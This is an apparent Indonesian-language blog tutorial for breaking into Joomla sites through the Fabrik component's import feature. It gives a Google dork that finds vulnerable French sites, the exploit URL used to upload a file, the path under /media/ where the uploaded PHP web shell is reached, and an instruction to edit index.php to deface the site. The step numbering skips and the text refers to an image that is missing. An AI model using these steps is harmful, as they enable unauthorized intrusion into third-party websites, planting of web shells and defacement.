Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:fr
2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1contoh: http://www.site.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4.Setelah proses uplods elesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbeda dengan gambar diatas. lalu masukan shell
http://www.site.com/media/nama shell.php
contoh: http://www.site.com/media/shell.php (Jika nama shell anda adalah shell)
cari index.php lalu edit
6. sukses







Blogger Comment
Facebook Comment